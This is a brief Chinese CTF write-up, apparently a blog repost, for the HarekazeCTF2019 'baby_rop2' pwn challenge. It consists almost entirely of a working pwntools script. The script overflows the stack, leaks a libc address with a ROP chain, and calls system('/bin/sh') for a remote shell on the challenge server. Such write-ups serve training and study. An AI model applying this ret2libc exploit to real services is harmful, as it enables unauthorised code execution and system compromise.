PWN [HarekazeCTF2019]baby_rop2
PWN [HarekazeCTF2019]baby_rop2
yulate
发布于 2023-05-02 11:09:04
发布于 2023-05-02 11:09:04
本文最后更新于 549 天前,其中的信息可能已经有所发展或是发生改变。
简单的栈溢出
payload
from LibcSearcher import *
from pwn import *
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = 'debug'
content = 0
elf = ELF('./babyrop2')
format_str = 0x0400770
print_plt = elf.plt['printf']
read_got = elf.got['read']
main_addr = elf.sym['main']
pop_rdi = 0x400733
pop_rsi_r15 = 0x400731
def main():
if content == 1:
p = process('./babyrop2')
else:
p = remote("node4.buuoj.cn", 26275)
payload = b'a' * (0x20 + 8) + p64(pop_rdi) + p64(format_str) + p64(pop_rsi_r15) + p64(
read_got) + p64(0) + p64(print_plt) + p64(main_addr)
p.recvuntil("What's your name? ")
p.sendline(payload)
read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload = b'a' * (0x20 + 8) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.recvuntil("What's your name? ")
p.sendline(payload)
p.interactive()
main()浏览量: 117
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2021-10-24 ,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录